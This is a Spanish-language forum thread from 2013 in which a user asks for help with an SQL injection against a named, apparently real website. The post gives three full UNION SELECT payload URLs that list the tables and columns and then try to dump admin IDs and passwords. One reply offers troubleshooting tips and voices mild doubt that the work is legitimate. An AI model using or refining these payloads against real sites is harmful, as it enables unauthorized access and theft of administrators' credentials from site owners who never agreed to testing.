elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Ético
| | |-+  Bugs y Exploits
| | | |-+  Problema con inyección SQL
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Problema con inyección SQL  (Leído 2,438 veces)
janisorna

Desconectado Desconectado

Mensajes: 20


Ver Perfil
Problema con inyección SQL
« en: 9 Julio 2013, 02:08 am »

Hola a todos!

Estoy haciendo un trabajo sobre vulnerabilidades informáticas i ahora las estoy probando para ver su funcionamiento, he estado haciendo inyección SQL en una web i al principio todo iba perfecto, he podido ver los nombres de las tablas, he encontrado la de admin, he podido ver los nombres de las columnas, pero a la hora de mostrar la información que contiene la tabla me sale este error:

Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in /nfs/c01/h12/mnt/9330/domains/blamm.com/html/top10.php on line 17

A continuación os dejo los pasos que he seguido para llegar hasta donde estoy, si veis algun error decidmelo porfavorr.

Para ver el nombre de las tablas:

Código:
http://www.blamm.com/top10.php?id=-8+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47+from+information_schema.tables+limit+0,1--

Para ver el nombre de las columnas:

Código:
http://www.blamm.com/top10.php?id=-8+union+select+1,2,3,column_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47+from+information_schema.columns+where+table_name=char(97,100,109,105,110)+limit+0,1--

admin = 97,100,109,105,110

I finalmente para ver la información de la tabla (aquí es donde me da error):

Código:
http://www.blamm.com/top10.php?id=-8+union+select+1,2,3,group_concat(admin_id,0x3a,admin_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47+from+admin--

Porfavor ayudadmee!!  ;D
« Última modificación: 9 Julio 2013, 02:12 am por janisorna » En línea

Cleantesdeasso

Desconectado Desconectado

Mensajes: 185



Ver Perfil
Re: Problema con inyección SQL
« Respuesta #1 en: 9 Julio 2013, 05:29 am »

 Leer los campos de a uno. O si es necesario usar group_concat, en lugar de concat a secas... Prueba.  Aunque blamm.com no me suena a "trabajo". No rompas nada, que después te sentirás mal. Y avisa, a no ser que no haya nadie... Bah, haz lo que te plazca, quien soy yo para aconsejar ;)
En línea

"Que no!! q el hash hay q crakiarlo!!"
janisorna

Desconectado Desconectado

Mensajes: 20


Ver Perfil
Re: Problema con inyección SQL
« Respuesta #2 en: 11 Julio 2013, 18:44 pm »

Ya he probado de hacerlo solo poniendo concat i poniendo gropu_concat pero me sigui dando el mismo error
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Problema Inyeccion SQL
Nivel Web
WiseHidden 8 3,560 Último mensaje 25 Diciembre 2010, 12:47 pm
por WiseHidden
problema Inyeccion DLL
Programación C/C++
tig0 4 1,502 Último mensaje 31 Julio 2011, 12:44 pm
por tig0
Problema inyeccion
ASM
rmdma() 2 2,030 Último mensaje 1 Marzo 2012, 13:43 pm
por _Enko
problema inyeccion SQL
Nivel Web
BigByte 5 2,104 Último mensaje 26 Enero 2014, 00:12 am
por dRak0
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines